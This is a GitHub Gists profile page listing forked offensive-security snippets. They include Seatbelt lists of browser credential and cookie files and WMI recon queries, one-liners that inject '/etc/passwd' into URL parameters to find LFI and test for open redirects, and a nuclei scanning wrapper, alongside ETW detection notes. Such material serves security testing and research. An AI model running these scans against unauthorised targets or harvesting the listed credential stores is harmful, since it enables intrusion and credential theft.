Skip to content

Instantly share code, notes, and snippets.

Avatar
💭
I may be slow to respond.

sasqwatch

💭
I may be slow to respond.
32 followers · 217 following · 569
View GitHub Profile
@sasqwatch
sasqwatch / QueryCfgNt.c
Created Feb 1, 2021 — forked from SecIdiot/QueryCfgNt.c
View QueryCfgNt.c
#include <windows.h>
#include <ntstatus.h>
#include <winternl.h>
#include <stdio.h>
typedef struct __attribute__((packed))
{
ULONG ExtendedInfoClass;
ULONG ExtendedInfoClassResponse;
} MITIGATION_POLICY, *PMITIGATION_POLICY;
@sasqwatch
sasqwatch / seatbelt_registry_basic_exploration.txt
Created Aug 19, 2020 — forked from Cyb3rWard0g/seatbelt_registry_basic_exploration.txt
View seatbelt_registry_basic_exploration.txt
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe", ""
SOFTWARE\\Microsoft\\Internet Explorer\\TypedURLs"
SOFTWARE\\Microsoft\\Internet Explorer\\TypedURLsTime"
Software\\Policies\\Microsoft Services\\AdmPwd", "AdmPwdEnabled"
Software\\Policies\\Microsoft Services\\AdmPwd", "AdminAccountName"
Software\\Policies\\Microsoft Services\\AdmPwd", "PasswordComplexity"
Software\\Policies\\Microsoft Services\\AdmPwd", "PasswordLength"
Software\\Policies\\Microsoft Services\\AdmPwd", "PwdExpirationProtectionEnabled"
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU", "UseWUServer"
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate", "WUServer"
@sasqwatch
sasqwatch / seatbelt_appdata_basic_exploration.txt
Created Aug 19, 2020 — forked from Cyb3rWard0g/seatbelt_appdata_basic_exploration.txt
View seatbelt_appdata_basic_exploration.txt
\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Bookmarks"
\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\"
\AppData\\Local\\Google\\Chrome\\User Data\\Default\\"
\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
\AppData\\Local\\Google\\Chrome\\User Data\\Default\\"
\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\"
\AppData\\Roaming\\gcloud\\credentials.db"
@sasqwatch
sasqwatch / seatbelt_wmi_query_strings_basic_exploration.txt
Created Aug 19, 2020 — forked from Cyb3rWard0g/seatbelt_wmi_query_strings_basic_exploration.txt
View seatbelt_wmi_query_strings_basic_exploration.txt
SELECT System.ItemPathDisplay,System.FileOwner,System.Size,System.DateCreated,System.DateAccessed,System.Search.Autosummary FROM SystemIndex WHERE Contains(*, '""*{0}*""') AND SCOPE = '{1}' AND (System.FileExtension = '.txt' OR System.FileExtension = '.doc' OR System.FileExtension = '.docx' OR System.FileExtension = '.ppt' OR System.FileExtension = '.pptx' OR System.FileExtension = '.xls' OR System.FileExtension = '.xlsx' OR System.FileExtension = '.ps1' OR System.FileExtension = '.vbs' OR System.FileExtension = '.config' OR System.FileExtension = '.ini')"
SELECT * FROM win32_networkconnection"
Select * from Win32_ComputerSystem"
SELECT * FROM Win32_DeviceGuard"
SELECT * FROM win32_service"
SELECT * FROM AntiVirusProduct"
SELECT * FROM MSFT_DNSClientCache"
SELECT ProcessId, ExecutablePath, CommandLine FROM Win32_Process"
SELECT * FROM Win32_Process"
SELECT * FROM Win32_Process WHERE SessionID != 0"
@sasqwatch
sasqwatch / is_cloudflare.py
Created Aug 19, 2020 — forked from dwisiswant0/is_cloudflare.py
Check if an IP is owned by Cloudflare
View is_cloudflare.py
#!/bin/env python
# Credits goes to @sw33tLie
from ipaddress import ip_network, ip_address
cidrs = ["173.245.48.0/20","103.21.244.0/22","103.22.200.0/22","103.31.4.0/22","141.101.64.0/18","108.162.192.0/18","190.93.240.0/20","188.114.96.0/20","197.234.240.0/22","198.41.128.0/17","162.158.0.0/15","104.16.0.0/12","172.64.0.0/13","131.0.72.0/22"]
def is_cloudflare(ip):
for cidr in cidrs:
net = ip_network(cidr)
@sasqwatch
sasqwatch / find js file one liner
Created Aug 18, 2020 — forked from dwisiswant0/find js file one liner
View find js file one liner
assetfinder site.com | gau|egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)'|while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Zo-9_]+" |sed -e 's, 'var','"$url"?',g' -e 's/ //g'|grep -v '.js'|sed 's/.*/&=xss/g'):echo -e "\e[1;33m$url\n" "\e[1;32m$vars";done
@sasqwatch
sasqwatch / nuclear.sh
Created Aug 18, 2020 — forked from dwisiswant0/nucleir.sh
Automate nuclei
View nuclear.sh
nucleir() {
local TPL="$HOME/Documents/nuclei-templates"
[[ -z "${1}" ]] && { echo "-target/-l ?"; return; }
[[ -z "${2}" ]] && { echo "Input target?"; return; }
for i in `ls -1d ${TPL}/*/`; do
if [[ ! "${i}" =~ (brute-force|examples|payloads) ]]; then
nuclei $1 $2 -t ${i} -o "$(basename $2)_nuclei-$(basename $i).txt"
fi
@sasqwatch
sasqwatch / nuclear.sh
Created Aug 18, 2020 — forked from dwisiswant0/nucleir.sh
Automate nuclei
View nuclear.sh
nucleir() {
local TPL="$HOME/Documents/nuclei-templates"
[[ -z "${1}" ]] && { echo "-target/-l ?"; return; }
[[ -z "${2}" ]] && { echo "Input target?"; return; }
for i in `ls -1d ${TPL}/*/`; do
if [[ ! "${i}" =~ (brute-force|examples|payloads) ]]; then
nuclei $1 $2 -t ${i} -o "$(basename $2)_nuclei-$(basename $i).txt"
fi
@sasqwatch
sasqwatch / bash_aliases.sh
Created Aug 18, 2020 — forked from dwisiswant0/bash_aliases.sh
One-liner to get Open-redirect & LFI
View bash_aliases.sh
lfi() {
gau $1 | gf lfi | qsreplace "/etc/passwd" | xargs -I % -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
}
open-redirect() {
local LHOST="http://localhost"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
}
@sasqwatch
sasqwatch / COMPlus_ETWEnabled_detection_notes.md
Created Aug 18, 2020 — forked from Cyb3rWard0g/COMPlus_ETWEnabled_detection_notes.md
View COMPlus_ETWEnabled_detection_notes.md

Initial Notes:

  • The .NET Runtime Event Provider requires setting COMPLUS_ETWEnabled=1 in your process' environment.
  • CLRConfig will look for configurations in the following places in the following order:
    • Look at environment variables (prepending COMPlus_ to the name)
    • Look at the framework registry keys (HKCU\Software\Microsoft\.NETFramework
    • Look at the framework registry keys HKLM\Software\Microsoft\.NETFramework)
  • These can be set in the following ways:
    • Setting the environment variable COMPlus_:
      • Windows